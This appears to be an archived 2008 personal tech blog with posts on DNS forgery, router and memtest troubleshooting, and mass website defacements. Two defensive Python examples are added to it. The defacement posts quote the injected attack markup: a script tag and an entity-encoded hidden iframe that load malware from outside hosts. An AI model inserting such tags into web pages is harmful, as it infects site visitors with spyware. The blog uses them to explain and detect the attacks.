Comet.aaazen.com - Comet Blog

Ramblings of Comet--Berkeley


Internet Design Vulnerability - DNS and BIND (permalink):
Tuesday, August 26, 2008   11:20:00 AM PDT

The internet was originally designed by military scientists to be invulnerable to physical attacks on centralized switching/routing facilities.

So the internet does not rely on a centralized routing system but instead relies on a distributed routing system.

Where were the issues of identification, authorization, etc. that are so vital to business accounting covered?

These business/security issues were never in the original design...

DNS and BIND

DNS (the Domain Name System, which performs domain name resolution) is a critical piece of the internet. It is the process by which a domain name such as "google.com" is turned into a number such as 64.233.167.99.

It is something that everyone's web browser does silently every time a web link is accessed, and most people don't pay much attention to it.

Every time you ask your web browser for a page, it goes out to the internet, typically to a DNS server (very often running the BIND software) that is provided by your ISP, your internet service provider. The server takes the domain name that the web browser provides and returns an IP address: it takes google.com and returns 64.233.167.99.

D. J. Bernstein hated the internet-standard BIND program for DNS resolution so much that he decided to write his own DNS resolver, djbdns.

I was curious about why he rewrote BIND and had no particular opinion about it until I saw the recent debacle with DNS BIND caching this July.

And then the fix announced at the August DefCon, followed by the "unfix" reported by a Russian hacker in the New York Times.

BIND has lots of problems, and they are not just programming problems but basic design problems.

To quote the NY Times article, "The root of the problem lies in the fact that the address system, which was invented in 1983, was not meant for services like electronic banking that require strict verification of identity."

djbdns is a step in the right direction but it is not enough as the current DNS system is flawed from the beginning and will always be vulnerable to forgery.

As D. J. Bernstein says in his article on DNS Forgery, "An attacker with access to your network can easily forge responses to your computer's DNS requests."

He suggests using public key cryptography and maybe that is the best solution for now.

Of course the ideal solution is to not do banking/accounting/etc. on public networks at all, but only on private networks.
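As an added illustration of the forgery problem discussed above (this is example code, not from the post, BIND or djbdns): the checks a resolver makes on a reply before trusting it. A blind forger must match all of them, so a resolver that kept a fixed source port (the state of BIND before the July 2008 patch) left only the 16-bit transaction ID to guess. The wire format is RFC 1035; build_response exists only to construct test traffic.

```python
import struct

def build_query(name: str, txid: int) -> bytes:
    """Encode a minimal RFC 1035 query for the A record of `name`."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # flags: RD; one question
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)             # QTYPE=A, QCLASS=IN

def build_response(query: bytes, ip: str, ttl: int = 300) -> bytes:
    """Build the answer a server would return for `query` (constructed test input only)."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA; one answer
    rdata = bytes(int(octet) for octet in ip.split("."))
    # 0xC00C is a compression pointer back to the question name at offset 12
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + rdata
    return header + query[12:] + rr

def response_matches(query: bytes, response: bytes,
                     sent_from_port: int, arrived_on_port: int) -> bool:
    """Accept a reply only if it is a response to our transaction ID, arrived on the
    port we sent from, and repeats the exact question we asked. A forged reply that
    fails any one of these must be dropped; the ID and port are all a blind forger
    has to guess, which is why source-port randomization was the 2008 fix."""
    if len(response) < len(query):
        return False
    q_txid = struct.unpack("!H", query[:2])[0]
    r_txid, r_flags = struct.unpack("!HH", response[:4])
    if not r_flags & 0x8000 or r_txid != q_txid:      # must be a response to our ID
        return False
    if arrived_on_port != sent_from_port:             # must hit the port we sent from
        return False
    return response[12:len(query)] == query[12:]      # question section must match

def answer_ip(query: bytes, response: bytes) -> str:
    """Extract the IPv4 address from the first answer record of a matched response."""
    off = len(query)                                  # answer section follows the question
    _, rtype, _, _, rdlen = struct.unpack("!HHHIH", response[off:off + 12])
    assert rtype == 1 and rdlen == 4, "expected an A record"
    return ".".join(str(b) for b in response[off + 12:off + 16])

if __name__ == "__main__":
    q = build_query("google.com", 0x1234)
    r = build_response(q, "64.233.167.99")
    print(response_matches(q, r, 40123, 40123), answer_ip(q, r))
```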

Tomato eth%d: 3.90.38.0 driver failed with code 23 (permalink):
Tuesday, June 24, 2008   10:13:00 PM PDT

My Linksys WRT54G wireless router stopped transmitting/receiving and I could not figure it out.

I tried resetting the WLAN connection, rebooting the router and finally unplugging and re-plugging the power connection.

None of this worked to make the "wireless" part of the router work again.

There was a system log message showing that the eth1 interface was not working though:

eth%d: 3.90.38.0 driver failed with code 23

After doing some web research on OpenWRT I was finally able to fix the problem.

I ssh-ed into the router and issued this command:

insmod wl

And the system log immediately showed this:

eth1: Broadcom BCM4320 802.11 Wireless Controller

Yet More Green Zone Hacking (permalink):
Sunday, June 01, 2008   02:30:00 PM PDT

The dota11.cn problem mentioned in my Wednesday/Thursday blog is getting worse.

When I do this Google search for the hackers' script insertion, I now find over 280,000 hits, whereas on Thursday I was finding only around 210,000.

Clearly this problem is growing.
As a precaution, I recommended several things in my last blog.
Using an Apple computer is not a bad idea either, but there is really no inherent safety in using Linux or an Apple computer except that the hackers go for Windows machines because they are the most popular.

The root cause of these kinds of problems is that we allow almost any web site to run code on our home machines.
In a professional business computing environment this should never be allowed.

But somehow it has become "acceptable" for home users. So the safest thing for home users is to never do "business" on their home computers. Never do online banking or commerce.

The Internet never was designed for business/security, and its best uses are probably educational, entertainment and socializing.

More Hacked in the Green Zone (permalink):
Thursday, May 29, 2008   09:52:00 AM PDT

May 28, 8:47 AM PDT (GMT-7)
So called "trusted" web sites are no longer trustworthy as I reported in my earlier blog:
Hacked in the Green Zone

The good news is that the San Francisco Chronicle reported on this on May 6, 2008:
Internet criminals gaining ground, experts say

The bad news is that I found a new problem. And I did not see that anyone else has picked up on the problem.

Here is what I found. On the morning of Tuesday May 27, 2008 the StarIQ.com Daily Horoscope was hacked. Embedded inside the description for each sign of the zodiac was a tag like this:

<script src=http://www.dota11.cn/m.js></script>

So if a Windows computer user clicked on his sign, then he would download some spambot, virus or who knows what from several web sites registered in China.

Essentially, the home computer is compromised and the hacker can do anything he likes with the machine.

Is StarIQ.com the only web site to have this problem?

Heck no. Doing a Google search turns up over 200,000 hits.
Thousands of these websites are still infected!

Examples: (Don't go to these websites unless you are protected!)
 www.morrellwinebar.com
 www.bioimmune.com
 www.americancapitalrealty.net

How did this happen? I would like to know. Somehow hackers are compromising thousands of web sites like StarIQ.com and changing their web pages.

What can the average home computer user do? Use the Firefox web browser with the NoScript add-on.

Another option is to just not use Windows; use Linux instead.

Update May 29 9:53 AM PDT

I reported the problem to Google.com and they flagged dota11.cn as a "bad" website. So if you do a Google search and try to click on an infected website, then a warning page appears first.

The "cause" of the infection appears to be SQL injection into Microsoft SQL Server through crafted values submitted in web form input, the same old web CGI, client-server problems that have been around for decades.

Here is a technical description of the problem:

www.0x000000.com

TeX4ht for Slackware (permalink):
Wednesday, May 21, 2008   10:10:00 AM PDT

I installed the build system for OpenWRT and wanted to create the HTML from the LaTeX documents, but my standard Slackware release 12.0 did not have the "htlatex" command.

Doing a Google search, I found "htlatex" as part of TeX4ht at:

  www.cse.ohio-state.edu/~gurari/TeX4ht/

There is an old Slackware 10 version of TeX4ht at LinuxPackages but I could not get it to work.

So I downloaded the source from the Ohio State site and created my own Slackware 12.0 package for download:

  tex4ht-2.0

The package might work on Zenwalk too because it is based on Slackware.

System Outage (permalink):
Thursday, May 15, 2008   09:11:00 PM PDT
This evening my DSL modem, a Speedstream 4100, stopped working and it took me several hours to get the web server back online. Fortunately I had a spare modem and was able to get the system back up fairly quickly. Otherwise it might have taken me a day or more...

Bram's BitTorrent Challenge (permalink):
Wednesday, April 30, 2008   12:34:00 PM PDT

Here are my answers to some of Bram Cohen's challenge puzzles:


Hacked in the Green Zone (permalink):
Friday, April 18, 2008   11:24:00 AM PDT

Iframe attacks are becoming very common as many websites are vulnerable.

The hackers in this case are not simply attacking the PC users but attacking the web servers themselves, a.k.a. the "Green Zone".

See this article by Roger Grimes on March 21.

Typically all pages at the hacked website will include code at the bottom of each page similar to this:

<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;"
width=1 height=1></iframe>

which translates into something like this on the user's computer:

<iframe src="http://cdpuvbhfzz.com/dl/adv598.php"
width=1 height=1></iframe>

When an unsuspecting user clicks on a trusted website, he downloads spyware, viruses, etc., as described in this article at CastleCops.
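A site owner can catch both injection patterns quoted on this page, the plain dota11.cn script tag from "More Hacked in the Green Zone" and the entity-encoded 1x1 iframe above, by scanning their own pages for script/iframe tags that pull from another host or are sized to be invisible. This is an added example, not code from the post; the sample HTML is constructed from the tags quoted above, and the site hostname passed in is a placeholder.

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample fragment: the two injected tags quoted in the posts, plus one
# legitimate same-site script for contrast.
SAMPLE_HTML = """<p>Daily Horoscope</p>
<script src=http://www.dota11.cn/m.js></script>
<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;"
width=1 height=1></iframe>
<script src="/js/site.js"></script>
"""

TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")

def tag_attrs(tag_body: str) -> dict:
    """Parse attributes and decode &#NNN; entities so an obfuscated src reads as plain text."""
    return {name.lower(): html.unescape(value.strip("\"'"))
            for name, value in ATTR_RE.findall(tag_body)}

def find_injected(page: str, site_host: str) -> list:
    """Return (tag, decoded src, reasons) for script/iframe tags that load from another
    host or are sized to be invisible; either is how these mass defacements show up."""
    findings = []
    for m in TAG_RE.finditer(page):
        tag = m.group(1).lower()
        attrs = tag_attrs(m.group(2))
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""        # "" for relative, same-site URLs
        reasons = []
        if host and host != site_host:
            reasons.append("loads from " + host)
        if tag == "iframe" and attrs.get("width") == "1" and attrs.get("height") == "1":
            reasons.append("1x1 hidden iframe")
        if reasons:
            findings.append((tag, src, "; ".join(reasons)))
    return findings

if __name__ == "__main__":
    for tag, src, why in find_injected(SAMPLE_HTML, "www.stariq.com"):  # placeholder host
        print(f"{tag}: {src} ({why})")
```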



memtest86+ v2.01 good 80808080 bad 80808000 (permalink):
Wednesday, April 09, 2008   12:46:00 PM PDT
I recently tested a Pentium 4 system with an Intel motherboard by running memtest86+ to check out the RAM chips.

I kept getting the following error no matter how I swapped around the memory chips on the motherboard:

   Test #3
   Address: 00000100020 1.0MB
   Good: 80808080
   Bad: 80808000

I would try one chip and then the other. I moved the two chips around the 4 available memory slots on the motherboard, but still got the same results.

The system seemed to be very stable and so the memory test error did not make sense.

I did a search on Google and found the following forum thread:

http://forum.x86-secret.com/archive/index.php?t-3670.html

And finally figured out that the error comes from plugging the mouse into a USB port instead of plugging it into the standard PS/2 port...

In fact I can "crash" memtest86+ every time just by moving the mouse when it gets to test #3.

But if the mouse is plugged into the PS/2 port, then there is no memory error and moving the mouse has no effect.

Moral of the story?

"If you take a test and fail, but everything checks out ok otherwise, then ignore the test."

or

"Stop playing around with your mouse and plug it into the right slot...."
Comet Home Page
last modified on 2023 April 8
Please send comments to: webmaster@comet.aaazen.com